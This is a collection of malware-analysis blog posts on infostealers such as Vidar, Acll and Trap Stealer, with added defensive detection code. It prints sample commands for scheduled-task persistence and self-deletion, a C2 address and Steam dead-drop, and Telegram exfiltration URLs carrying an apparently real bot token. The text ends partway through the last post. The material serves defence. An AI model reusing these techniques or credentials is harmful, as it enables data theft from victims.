ClearFake is the name of a JavaScript framework that allows creating JS iframes with arbitrary content, circumventing the web browser’s protective mechanisms. Originally spotted in August 2023, it was massively used in attack campaigns similar to the one described above. As in the current campaign, it was used to display an “update your browser” page, with some customisation depending on the browser the victim is using. The only difference now is the use of throwaway websites registered for the campaign instead of compromised legitimate pages, as in the original campaign.

Appearance of a fake browser update page built on the ClearFake framework

Lumma Stealer, on the other hand, is a much more recognisable malicious program. First seen in late 2022, it quickly gained popularity and notoriety on the Darknet. Built around the principle of a minimal footprint, it is capable of evading antivirus products that key on the typical activity of spyware. Combined with flexible distribution channels (YouTube promos of cracked software, spam in Discord), this pushed Lumma to its current popularity. In terms of functionality, it is a modular infostealer that collects passwords, session tokens, cryptowallet data, and so on.

Protect Your Network Browsing & PC Activities

Using GridinSoft Anti-Malware, you will be able to avoid shady sites and malicious frameworks before they can harm you. Its network security module will analyze the activities with multiple detection systems. Continuous database updates allow the program to have peak efficiency even against the most recent network threats. Try it out now!


The post Lumma Stealer Spreads Via Fake Browser Updates, Uses ClearFake appeared first on Gridinsoft Blog.

Trojan:Win32/Mamson.A!ac
https://gridinsoft.com/blogs/trojan-win32-mamson-aac/
Wed, 29 May 2024 14:34:04 +0000

Trojan:Win32/Mamson.A!ac is a Microsoft Defender detection for malware designed to gather data from the system it infects. Sometimes, known spyware families get this detection. The malware is typically distributed disguised as helpful utilities downloaded from untrustworthy sources.

Trojan:Win32/Mamson.A!ac Overview

Trojan:Win32/Mamson.A!ac is a Microsoft Defender detection that flags infostealer malware. This type of malicious program aims at collecting data from the infected system. Usually, it gathers login credentials from browser files, cookies, browser history, and other information about the victim’s Internet activity. In some cases, samples of RedLine Stealer appear under this detection. Still, the effect is exactly the same.

Trojan:Win32/Mamson.A!ac detection window

Mamson often spreads under the guise of helpful utilities downloaded from shady websites. Such places offer ideal conditions for malware distribution, as most cracked software requires the user to disable antivirus protection during installation. In certain cases, the malware may hide inside the installer itself.

Technical Analysis

Let’s analyze Trojan:Win32/Mamson.A!ac by tearing down one of its samples. Since this detection is generic, there could be rather wild variations in certain areas, but the “mainstream” functionality remains the same.

Once Mamson enters the system, it checks for signs of a virtual environment, debugging, or sandboxing. For this, it reads the following registry values:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Display

These keys keep info about the OS version, language packs, and display settings. Such data is useful both for fingerprinting and to determine whether the environment has anything synthetic about it.

Privilege Escalation

After the first steps, the malware escalates privileges, which gives it a foothold in the system. According to the sandbox log, it interacts with the Windows Error Reporting system to legitimise itself. One caveat a practitioner should keep in mind: WerFault.exe -u -p <pid> -s <event> is exactly the command line Windows itself launches when a process crashes, so the entries below are at least as consistent with the sample crashing in the sandbox as with deliberate manipulation.

%windir%\system32\wbem\wmiprvse.exe
%windir%\System32\svchost.exe -k WerSvcGroup
%windir%\system32\WerFault.exe -u -p 2660 -s 684

Further, it issues a command to the Service Control Manager. Malware that registers itself as a service is much harder to remove manually, since the running service holds its files open and attempts to delete them fail unless anti-malware software is used. Note, however, that the command observed here only starts the built-in Windows Time service (w32time); it is the same action the system’s own SynchronizeTime scheduled task performs, so on its own it is weak evidence of a malicious service.

C:\Windows\system32\sc.exe start w32time task_started

Defence Evasion

To avoid static detection, Mamson comes in a packed (encrypted) form. To legitimise itself, the malware also manipulates registry keys of the Identity Client Runtime Library (IdentityCRL). Some of the values are also used to store the malware configuration.

HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Property\001880060ADF5C62
HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Property\00188006102E98CE

To cover its tracks, this malware also manipulates the logs of the Windows Error Reporting system, editing out lines that record the WerFault interactions mentioned above. The paths below are the crash report WER writes for a process named executable.exe; that is also what you would see if the sample itself had crashed, so check the contents of Report.wer before treating this as anti-forensics.

C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_executable.exe_515752de8867334bf1b5dff986a385cbabdecb_6ccb0f67_0f5f9b13
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_executable.exe_515752de8867334bf1b5dff986a385cbabdecb_6ccb0f67_0f5f9b13\Report.wer
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1FF4.tmp.dmp

Data Collection

The primary goal of the Mamson infostealer is to collect sensitive information. Upon finishing preparations, the malware starts by creating a folder at C:\Users\[USER]\Downloads\cp and copying data from C:\Users\[USER]\AppData\Local\Google\Chrome\User Data\Default\Login Data. Login Data is the SQLite database in which Chrome stores saved usernames and their encrypted passwords (session tokens live in the Cookies database next to it). It also collects the following data:

C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Crypto\Keys\de7cf8a7901d2ad13e5c67c29e5d1662_cbbb49d6-b7ff-44ca-aba5-8a5e250d4d42
C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\c74ecc55-989d-484d-a8fe-47bdfda57159
C:\Windows\System32\spp\store\2.0\cache\cache.dat

Additionally, Mamson accesses cryptocurrency apps and wallets to harvest credentials. I did not have a spare crypto wallet to sacrifice for the test, so there were no corresponding logs. Once data collection is complete, the malware sends it to one of the command servers. Their IP addresses are built into the malware sample; note that all three fall within ranges used by a large content delivery network, so they may equally reflect background system traffic captured in the sandbox and should be treated as weak indicators:

23.216.147.76:443
23.216.147.64:443
104.86.182.8:443

How To Remove Trojan:Win32/Mamson.A!ac?

To remove Trojan:Win32/Mamson.A!ac, you will need to scan with GridinSoft Anti-Malware. Since the malware targets Windows’ built-in defences, they may be disabled or not working correctly. With GridinSoft Anti-Malware, you can be sure the malware is completely gone. Run a Full scan to check the entire system and remove even the most covert threats.


The post Trojan:Win32/Mamson.A!ac appeared first on Gridinsoft Blog.

Password Stealer
https://gridinsoft.com/blogs/password-stealer/
Tue, 28 May 2024 11:04:42 +0000

A password stealer is a type of data-stealing malware that aims at a specific category of information. Password stealers are often spread through phishing, malvertising, and sometimes cracked software. Let’s have a more detailed look at how they work and how to protect yourself against them.

What Is a Password Stealer?

As its name suggests, password stealer is a type of malware that aims to steal sensitive data. Mainly, this is about credentials to email accounts, social networks, and online banking. But these days, quite a few password stealers incorporate more diverse functionality. They now target crypto wallets, cookies, browser cache and saved passwords, Discord session tokens, and more.

Diagram: how a password stealer works

The primary distribution method of password stealers is phishing emails with malicious attachments. Sometimes, however, password stealers can also be distributed via malicious ads in search results. In a selection of cases, spear phishing was used to attack a specific person with the malware.

Technical Analysis

All stealers are broadly similar, so the properties of this instance largely apply to the others, perhaps with minimal differences. This is a rather simplified analysis aimed at understanding how a password stealer works; I will go through the most common and important actions this malware performs. For the test sample, I chose Vidar Stealer, a classic password stealer written in C++. The attack commonly begins when the victim runs an infected file.

Defense Evasion

Like most malware, it has a few tricks that make it particularly difficult to detect on the system. When the malware comes under the guise of an installer for a legitimate program, it can be padded with a huge run of null bytes appended after the executable’s real content, pushing its size over 700 MB. Such a size lets it slip past antivirus engines and online checkers like VirusTotal that skip or refuse very large files. Another trick aimed at evading detection is code obfuscation. The malware also checks system parameters to ensure it is not running in a virtualised environment. It checks values such as:

HKEY_LOCAL_MACHINE\SYSTEM\Setup
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

These keys contain information about the system and hardware (the CPU name string can reveal a hypervisor, for instance) and, beyond sandbox identification, allow the malware to build a unique fingerprint of the infected system.
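The size-inflation trick is worth checking for directly, because the padding does not change the PE structure: the headers still describe sections that end long before the end of the file, and everything past that point is an overlay of zeros. The following Python check is an added example, not code from the original post or from Gridinsoft. It walks the section table to find where the last section’s raw data ends, measures the overlay behind it and flags files whose overlay is large and almost entirely null bytes. The build_test_pe helper constructs a minimal PE purely to exercise the check offline; the 50 MB and 95 % thresholds are my own choices, not figures from the post.

```python
import struct


def pe_end_of_sections(data):
    """Offset just past the last section's raw data, or None if this is not a PE file."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    nsections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    sect = e_lfanew + 24 + opt_size            # start of the section table
    if sect + 40 * nsections > len(data):
        return None
    end = sect + 40 * nsections                # at minimum the table itself
    for i in range(nsections):
        # SizeOfRawData and PointerToRawData sit at offsets 16 and 20 of each entry
        raw_size, raw_ptr = struct.unpack_from("<II", data, sect + 40 * i + 16)
        end = max(end, raw_ptr + raw_size)
    return end


def overlay_stats(data):
    """(overlay length, fraction of overlay bytes that are zero), or None for non-PE input."""
    end = pe_end_of_sections(data)
    if end is None:
        return None
    overlay = data[end:]
    if not overlay:
        return 0, 0.0
    return len(overlay), overlay.count(0) / len(overlay)


def is_inflated(data, min_overlay=50 * 1024 * 1024, zero_ratio=0.95):
    """True when the file carries a large, almost entirely zero overlay past the last section."""
    stats = overlay_stats(data)
    if stats is None:
        return False
    length, zeros = stats
    return length >= min_overlay and zeros >= zero_ratio


def build_test_pe(payload=b"\xcc" * 64, padding=b""):
    """Constructed minimal PE with one .text section; only used to exercise the checks above."""
    e_lfanew = 0x80
    opt_size = 0xE0
    sect_off = e_lfanew + 24 + opt_size
    raw_ptr = sect_off + 40                    # section data follows the single header
    hdr = bytearray(raw_ptr)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, e_lfanew)
    hdr[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    struct.pack_into("<HH", hdr, e_lfanew + 4, 0x14C, 1)      # Machine, NumberOfSections
    struct.pack_into("<H", hdr, e_lfanew + 20, opt_size)     # SizeOfOptionalHeader
    hdr[sect_off:sect_off + 8] = b".text\0\0\0"
    # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
    struct.pack_into("<IIII", hdr, sect_off + 8, len(payload), 0x1000, len(payload), raw_ptr)
    return bytes(hdr) + payload + padding
```

Legitimate installers often carry a non-zero overlay (an embedded archive or a signature block), which is why the check looks at the zero ratio and not just the overlay size; a file with hundreds of megabytes of nulls behind a small PE has no honest reason to exist.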

Data Collection

Once the malware is convinced it is not running in a sandbox and has established a foothold in the system, it moves on to its primary function: information gathering. The password stealer collects the following from browsers:

C:\Users\admin\AppData\Local\Temp\History\History.IE5\index.dat
C:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.dat
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
C:\Windows\system32\CRYPTBASE.dll
C:\Documents and Settings\\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004
C:\Users\user\AppData\Local\Google\Chrome\User Data\

These folders contain information such as autofill data, saved passwords, cookies, cache, and browser extensions. Next, the stealer tries to collect crypto wallet data by checking the locations below. This list includes only a few wallets, as the full list is too long to reproduce.

C:\Users\user\AppData\Local\Blockstream\Green\wallets\
C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\

Data Exfiltration

The malware’s final operation step is stolen data exfiltration. To do this, password stealer communicates with C2 (Command and Control) to receive further instructions. By the way, there can be various options for communicating with C2. Attackers often still use classic C2 servers; sometimes, they use Telegram or Mastodon as intermediate servers. However, in our case, the malware uses Steam. Before sending the stolen data, stealer sends several requests, including:

GET https://steamcommunity.com/profiles/76561199548518734 200

This is a link to a Steam profile. However, the profile’s odd display name, “sppmon http://195.201.131.165|”, is a command for the malware: it is in fact the address of the final server the stealer should connect to. The phrase “This user has also played as” shows that the address in the name changes quite often.

Steam profile used as an intermediate server
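The dead-drop resolver described above is easy to reproduce on the analyst’s side, which is useful when you want to pull the current C2 out of a captured profile page without running the sample. The following Python snippet is an added example, not code from the original post or from Gridinsoft: it parses the persona name out of a Steam profile page and applies the “<tag> <url>|” convention shown above to recover the address. The HTML fragment is constructed for the example with a documentation-only IP in place of the real C2; the actual_persona_name class is what the live profile page uses for the display name, but treat that as an assumption that may need adjusting if Steam changes its markup.

```python
import re
from html.parser import HTMLParser

# Constructed fragment of a Steam profile page. The display name follows the
# "<tag> <url>|" convention seen in the sample; 203.0.113.0/24 is a documentation range.
PROFILE_HTML = """
<html><body>
<div class="profile_header">
  <span class="actual_persona_name">sppmon http://203.0.113.10|</span>
  <div class="profile_summary">This user has also played as: sppmon http://203.0.113.9|</div>
</div>
</body></html>
"""

# "<tag> <url>|" with the trailing pipe acting as a terminator
C2_IN_NAME = re.compile(r"^\s*(?P<tag>[A-Za-z0-9]+)\s+(?P<url>https?://[^\s|]+)\|")


class PersonaName(HTMLParser):
    """Collects the text content of every element carrying the persona-name class."""

    def __init__(self):
        super().__init__()
        self.depth = 0          # >0 while inside a persona-name element
        self.names = []

    def handle_starttag(self, tag, attrs):
        classes = (dict(attrs).get("class") or "").split()
        if self.depth:
            self.depth += 1     # nested element inside the name span
        elif "actual_persona_name" in classes:
            self.depth = 1
            self.names.append("")

    def handle_endtag(self, tag):
        if self.depth:
            self.depth -= 1

    def handle_data(self, data):
        if self.depth:
            self.names[-1] += data


def resolve_dead_drop(html, expected_tag="sppmon"):
    """Return the C2 URL hidden in the profile name, or None if the name is not a drop."""
    parser = PersonaName()
    parser.feed(html)
    for name in parser.names:
        m = C2_IN_NAME.match(name)
        if m and m.group("tag") == expected_tag:
            return m.group("url")
    return None
```

Only the current display name is trusted; the “has also played as” history is deliberately ignored, since the malware itself reads the live name and older addresses are usually already dead.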

When finished, the stealer deletes itself and covers its tracks. Not all infostealers do this; some prefer to stay in the system even after extracting all the data. But when they do, a shell command like this one comes in handy:

"%ComSpec%" /c taskkill /im "%SAMPLENAME%" /f & erase "%SAMPLEPATH%" & exit

Difference Between Password Stealer and Spyware

Password stealers and spyware may look similar, but they have some fundamental differences. The first lies in the principle of operation: a stealer works quietly and quickly, often sticking to “steal and leave” tactics. Spyware, on the other hand, aims at a long and permanent presence in the system. Although some stealers can take screenshots and capture keyboard input in addition to collecting sensitive data, this is not their main functionality.

Spyware, on the other hand, can stay on an infected system for months and continuously collect data. This includes screenshots, capturing keystrokes, and camera and microphone recordings. This data is sent periodically or in real-time to the attacker’s server.

Safety Recommendations

Malware, and password stealers in particular, tends to become more and more sophisticated. Getting harder to detect, picking new distribution channels, collecting more and more data: all of this makes them a menace to be aware of. Fortunately, keeping them off your PC is not particularly hard.

  • Be careful with email attachments. This is still the leading vector of successful malware infections. Do not open attachments or click links if the sender is suspicious or the email is not one you were expecting.
  • Avoid cracked software. Pirated software is illegal in itself, but it also carries serious risks. Attackers embed malicious code in “repacks”, and installing most cracked programs requires disabling security software.
  • Use security software. A reliable anti-malware solution is essential because it can prevent malware from running and installing in case of user error, and it significantly reduces infection vectors overall. In addition, advanced solutions such as GridinSoft Anti-Malware have an Internet Security module that blocks potentially malicious sites.

The post Password Stealer appeared first on Gridinsoft Blog.

Trojan:Win32/Acll
https://gridinsoft.com/blogs/trojan-win32-acll/
Thu, 23 May 2024 10:46:11 +0000

Trojan:Win32/Acll is a stealer malware detected by Microsoft Defender. It targets sensitive information, login credentials, personal details, and financial data. It spreads through pirated software, malicious ads, or bundles.

Trojan:Win32/Acll Overview

Trojan:Win32/Acll is a stealer-type malicious software coded in Python. It is designed to extract and transmit sensitive information from devices. Such malware targets a wide range of data, including system information, login credentials, personal details, and financial data. In addition to extracting data from various applications such as browsers, email clients, messengers, and others, Trojan:Win32/Acll can grab files, do keylogging, manipulate clipboards, and perform other spyware functionalities.

Trojan:Win32/Acll detection window

It spreads through ways typical of other spyware: malicious email attachments and pirated applications. However, some samples mimic hardware management tools, specifically fan control utilities and UEFI parameter modifiers. In this way the malware obtains administrator privileges, as such software commonly requires elevated access to work.

Technical Analysis

Let’s look at how Trojan:Win32/Acll behaves in the system. Despite most of the samples being a rather recent discovery, there are quite a few researches upon each of them, meaning that the malware is pretty widespread. Before starting its dirty deeds, it performs checks for the signs of virtualization in the environment. This reconnaissance helps Acll to avoid analysis or sandboxing. Malware checks the following locations:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy

These keys cover the user’s certificate store, the FIPS cryptographic policy, and various aspects of Explorer behaviour and security. Bear in mind that the certificate and FIPS keys are also read routinely by the Python and OpenSSL runtime when it initialises TLS, so on their own they are a weak indicator. The malware also uses code obfuscation and other tricks to avoid detection.

Mutex Creation & Privilege Escalation

After making sure it is not running in a hostile environment, Trojan:Win32/Acll creates mutexes to prevent more than one instance from running at the same time. Note that the SM0:<pid>:304:WilStaging_02 names below are created by the Windows Implementation Library’s feature-staging code in many ordinary processes (the first number is the PID), so they are not a usable indicator of this family:

Local\SM0:3648:304:WilStaging_02
Local\SM0:5144:304:WilStaging_02

Then, the malware manipulates files and adds itself to the Task Scheduler to provide regular startups. Also, it creates entries in the Run registry keys, making the system run the malware upon startup.

schtasks /create /f /RU "%USERNAME%" /tr "%ProgramData%\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
HKEY_USERS\%SID%\Software\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5

Creating these hooks finalises the preparations, after which the malware moves on to loading DLLs and running at full power. The sandbox log also shows C:\Windows\System32\wuapihost.exe -Embedding; that is the Windows Update Agent COM server, launched by DCOM when a process instantiates the WUA API, so it indicates that Acll queried the update client rather than DLL sideloading in the strict sense.
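Both the Mamson and the Acll write-ups quote process-creation entries straight from a sandbox log, and several of them (WerFault, svchost -k WerSvcGroup, sc start w32time task_started, wuapihost -Embedding) are ordinary Windows behaviour that shows up in almost any run. The following Python triage helper is an added example, not code from the original posts or from Gridinsoft: it separates such OS noise from the entries that actually matter (a schtasks persistence task with /rl HIGHEST, a Run-key write, a PowerShell download one-liner) and pulls the task name, target and run level out of the schtasks command line. The log entries are constructed for the example, modelled on the ones quoted above; the classification rules and their explanations are my own.

```python
import re
import shlex

# Constructed process-creation log, one command line per entry, modelled on the
# sandbox entries quoted in the Mamson and Acll analyses above.
PROCESS_LOG = [
    r'C:\Windows\system32\wbem\wmiprvse.exe',
    r'C:\Windows\System32\svchost.exe -k WerSvcGroup',
    r'C:\Windows\system32\WerFault.exe -u -p 2660 -s 684',
    r'C:\Windows\system32\sc.exe start w32time task_started',
    r'C:\Windows\System32\wuapihost.exe -Embedding',
    r'schtasks /create /f /RU "user" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST',
    r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ExtreamFanV5 /t REG_SZ /d "C:\Users\user\AppData\Roaming\ExtreamFanV5.exe"',
]

# (pattern, explanation): OS-driven activity that says little about the sample itself.
NOISE_RULES = [
    (re.compile(r"\\WerFault\.exe\s+-u\s+-p\s+(\d+)\s+-s\s+\d+", re.I),
     "WER crash handler started by the OS for PID {0}; the sample probably crashed"),
    (re.compile(r"\\svchost\.exe\s+-k\s+WerSvcGroup", re.I),
     "Windows Error Reporting service host"),
    (re.compile(r"\\sc\.exe\s+start\s+w32time\s+task_started", re.I),
     "starts the built-in Windows Time service; same action as the SynchronizeTime scheduled task"),
    (re.compile(r"\\wuapihost\.exe\s+-Embedding", re.I),
     "Windows Update Agent COM server launched by DCOM; the sample used the WUA API"),
    (re.compile(r"\\wmiprvse\.exe", re.I), "WMI provider host"),
]

RUN_KEY = re.compile(r"\\CurrentVersion\\Run\b", re.I)
PS_DOWNLOAD = re.compile(r"downloadstring|invoke-webrequest|\biwr\b|\biex\b|-enc")


def parse_schtasks(cmd):
    """Pull /tr, /tn, /sc and /rl out of a schtasks /create command line."""
    args = shlex.split(cmd, posix=False)   # non-POSIX: keep backslashes, honour "quoted paths"
    opts = {}
    for i, a in enumerate(args):
        if a.lower() in ("/tr", "/tn", "/sc", "/rl") and i + 1 < len(args):
            opts[a.lower()] = args[i + 1].strip('"')
    return opts


def classify(cmd):
    """Return (verdict, detail) for one process-creation command line."""
    for pat, text in NOISE_RULES:
        m = pat.search(cmd)
        if m:
            return "noise", text.format(*m.groups())
    low = cmd.lower()
    if "schtasks" in low and "/create" in low:
        o = parse_schtasks(cmd)
        detail = f"scheduled task {o.get('/tn')!r} -> {o.get('/tr')}"
        if o.get("/rl", "").upper() == "HIGHEST":
            detail += " (run level HIGHEST)"
        return "persistence", detail
    if low.startswith("reg ") and " add " in low and RUN_KEY.search(cmd):
        return "persistence", "Run key value written"
    if "powershell" in low and PS_DOWNLOAD.search(low):
        return "download", "PowerShell fetching or decoding remote content"
    return "unknown", ""


def triage_process_log(log):
    """Classify every entry; returns a list of (verdict, detail, command)."""
    return [(*classify(c), c) for c in log]
```

The point of the noise table is not to dismiss those entries but to stop them from being written up as “privilege escalation” or “sideloading”; a WerFault line, for instance, is worth noting precisely because it tells you the sample crashed and the rest of the log may be incomplete.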

Data Collection

As I said before, Trojan:Win32/Acll is an infostealer that specifically targets sensitive user data and cryptocurrency wallets. The malware attempts to collect credentials either as hashes or as plaintext passwords. In addition to searching the device, it tries to retrieve passwords from shared password storage locations and browser folders. Acll checks the following locations:

C:\Program Files\Common Files\SSL\openssl.cnf
C:\Users\\AppData\Local\Google\Chrome\User Data\
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\
C:\Users\user\AppData\Local\BraveSoftware\Brave-Browser\User Data
C:\Users\user\AppData\Local\Vivaldi\User Data
C:\Users\user\AppData\Roaming\Opera Software\Opera GX Stable
C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data

Further, it switches to desktop cryptocurrency wallets. The list of targeted ones is not massive, but I am sure it is just a matter of time before this malware starts targeting others.

C:\Program Files\Common Files\SSL\cert.pem
C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
C:\Users\user\AppData\Roaming\Electrum\wallets
C:\Users\user\AppData\Roaming\Ethereum\keystore
C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
C:\Users\user\AppData\Roaming\bytecoin

The same applies to FTP and VPN credentials. The reviewed samples targeted only FileZilla, OpenVPN and NordVPN (if they targeted them at all), but broader coverage is not hard to implement. I would still recommend resetting all passwords that were stored in one form or another on the affected device.

Data Exfiltration

After collecting the information, Trojan:Win32/Acll sends it to the C2. Several Win32/Acll samples use a Telegram bot as an intermediate server, as evidenced by their network activity:

https://api.telegram[.]org/bot7006468177:AAEjUyc53owWdXWMasYo_ZE1Y7t2sH1O718/sendMessage
https://api.telegram.org/bot7006468177:AAEjUyc53owWdXWMasYo_ZE1Y7t2sH1O718/sendDocument
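Telegram-based exfiltration has a distinctive shape on the wire: the bot token sits in the URL path, and the upload methods (sendDocument in particular) point in the opposite direction from legitimate bot polling. The following Python detector is an added example, not code from the original post or from Gridinsoft: it parses Bot API URLs out of proxy log lines, keeps only the methods that push data off the host, and groups them by source host and bot ID so that one compromised machine talking to one bot shows up as a single finding. The log lines and the bot token are constructed for the example (the token is a placeholder, not the one seen in the sample); the set of upload methods is my own selection from the public Bot API.

```python
import re
from urllib.parse import urlsplit

FAKE_SECRET = "A" * 35   # placeholder with the 35-character shape of a real bot secret

# Constructed proxy log lines: "<time> <src> <method> <url> <status>".
PROXY_LOG = f"""\
2024-05-20T12:00:01Z 10.1.1.20 POST https://api.telegram.org/bot1234567890:{FAKE_SECRET}/sendMessage 200
2024-05-20T12:00:04Z 10.1.1.20 POST https://api.telegram.org/bot1234567890:{FAKE_SECRET}/sendDocument 200
2024-05-20T12:00:09Z 10.1.1.21 GET https://web.telegram.org/a/ 200
2024-05-20T12:01:00Z 10.1.1.22 GET https://api.telegram.org/bot987654321:{"B" * 35}/getUpdates 200
"""

# Bot API path: /bot<numeric id>:<35-char secret>/<method>
BOT_PATH = re.compile(r"^/bot(?P<bot_id>\d{8,12}):(?P<secret>[A-Za-z0-9_-]{35})/(?P<method>\w+)$")

# Methods that push data out of the host; getUpdates-style polling goes the other way.
UPLOAD_METHODS = {"sendMessage", "sendDocument", "sendPhoto", "sendVideo", "sendAudio", "sendMediaGroup"}


def parse_bot_call(url):
    """Return (bot_id, method) for a Telegram Bot API URL, else None."""
    u = urlsplit(url)
    if u.hostname != "api.telegram.org":
        return None
    m = BOT_PATH.match(u.path)
    return (m.group("bot_id"), m.group("method")) if m else None


def find_exfil(log_text):
    """Group outbound Bot API uploads by (source host, bot id): {key: [methods...]}."""
    seen = {}
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue  # malformed line, skip
        src, url = fields[1], fields[3]
        call = parse_bot_call(url)
        if call and call[1] in UPLOAD_METHODS:
            seen.setdefault((src, call[0]), []).append(call[1])
    return seen
```

The bot ID (the numeric part before the colon) is stable across a campaign even when the secret is rotated, which makes it a better pivot for hunting across hosts than the full token.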

In addition to Telegram (149.154.167.220 belongs to Telegram’s own address space), the malware contacts various cloud services, including OneDrive, Microsoft Azure, and EdgeCast (Verizon Media), among others. Here is the list of IP addresses:

TCP 204.79.197.203:443
TCP 34.117.186.192:443
TCP 149.154.167.220:443
TCP 20.99.186.246:443

How To Remove Trojan:Win32/Acll?

To remove Trojan:Win32/Acll, I recommend using GridinSoft Anti-Malware, which you can download and install from the link below. After installation, run a Full scan and let it finish, so the program will find all the malware-related files. In addition to malware removal, GridinSoft Anti-Malware can provide proactive protection and internet security. This will help prevent malware installation even at the download stage.


The post Trojan:Win32/Acll appeared first on Gridinsoft Blog.

How to remove Trojan:Script/Wacatac.B!ml
https://gridinsoft.com/blogs/trojanwin32-wacatac/
Mon, 06 May 2024 13:54:09 +0000

Trojan Wacatac is an umbrella detection for a wide range of malicious software that shares functionality and code. The Wacatac name has been attached to malware with dropper capabilities used to deliver ransomware, as well as to stealers such as the one analysed below.

Trojan Wacatac Detection

Trojan:Script/Wacatac.B!ml and Trojan:Win32/Wacatac.B!ml are among the numerous detection names Microsoft assigns to minor malware families. A lot of similar-yet-different malicious software has received this name because of shared code and similar functionality. Microsoft’s name often becomes a common noun for all similar malware.

When it comes to functionality, Wacatac is mostly spyware or stealer malware. Some of the sub-specimens may be distinctive for using Discord, Telegram, or Mastodon as data exfiltration channels. To have a more clear understanding of what the malware under the Wacatac name looks like, let’s analyze a sample of malware detected as Wacatac.

Trojan:Script/Wacatac.B!ml

For the analysis of a real-world Wacatac trojan example, I opted for Trap Stealer. Microsoft detects it as Trojan:Script/Wacatac.B!ml (see more info on VirusTotal). The Python-based sample is rather unusual: it is an open-source stealer with its source code published on GitHub. Its builder features extensive functionality and, in particular, offers to create a disguise out of the box. But let’s have a closer look.

In the GitHub repository that contains the malware’s source code, its developers show off most of the functionality. It corresponds to the abilities of a classic stealer: the malware gathers info from WhatsApp, steals cookies, clipboard and AutoFill contents, scrapes passwords, and can capture screenshots. On top of that, Trap Stealer boasts the ability to cause mischief on the host system.

Extensive list of functions the malware boasts of

Detection Evasion Methods

I’d pay additional attention to how this malware disguises itself. As I said, the builder offers not only to specify a Discord webhook as a relay server, but also to establish a “shell” that will make the user launch the malware deliberately. Currently, there are two options for this shell – a fake Discord webhook creation tool and a pseudo-Discord Nitro generator. Malware masters may choose one during the building, or choose none at all.

These methods, though, are meant to evade the user’s suspicion. Against anti-malware software, and especially against malware analysis environments, the malware has several dedicated tricks up its sleeve.

Upon execution, the malware performs a series of checks to ensure that it is not running under a debugger, that the system is not located in one of the blacklisted countries, and that it is not a virtual machine. If any check returns an unacceptable result, execution is terminated.

Check            Purpose
check_dll        Scans the list of loaded DLLs for ones related to virtualization software
check_IP         Compares the system’s IP address against an embedded blacklist of countries
check_registry   Scans the Windows Registry for entries related to VMware products
check_windows    Enumerates open windows and checks whether any belong to reverse-engineering or debugging tools

Establishing Persistence

Once all the aforementioned checks are done, Wacatac makes itself persistent to the attacked environment. It creates its randomly-named copy in a random directory in the AppData or LocalAppData folder of a user directory. Then, the malware adds a corresponding value to the Run entry of the system registry. This ensures the malware startup with the system.

These steps may be accompanied by more, if additional actions were specified in the process of sample building. For instance, malware can hook up to the Discord startup, or establish persistence using the user startup folder instead of the registry key.

Data Gathering

The malware proceeds to its normal activity after establishing persistence. The first thing to do is to collect all the data about the system – it gathers quite a big list of it. Interestingly enough, the malware sends the log with this info to the command server almost instantly. This contrasts with the typical fashion of doing things, when the stealer will get everything it can reach and only then send it to the C2.

System info            Malware instance info    Software & hardware info
Username               Node name                OS name
IP address             Release                  System activation key
Country                Version                  PC name
Postal code            Machine                  CPU model
Region                 Home directory           GPU model
City                                            Installed antivirus
Longitude/latitude

This extensive list of system data is then accompanied by collected passwords and cookies. For password stealing, Wacatac particularly targets web browser files, seeking the specific files programs use to store credentials. Aside from files that can contain credentials, Wacatac also collects all the cookies it can find. Everything is then kept in files in the AppData\Local\Temp directory, under names that start with the prefix “wp”.

This Wacatac instance also goes for browsing history. Since the way it is stored is more or less the same across most browsers, the malware targets quite a few of them. Here is the list:

  • Safari
  • Firefox
  • Chrome
  • Opera
  • Edge
  • Opera GX
  • Internet Explorer

Stealing Discord Tokens

The Trojan:Script/Wacatac.B!ml sample we are reviewing pays significant attention to Discord, though this is not unique among stealers. Moreover, the method it uses to extract session tokens is more or less the same across all malware samples. Let’s dive into it.

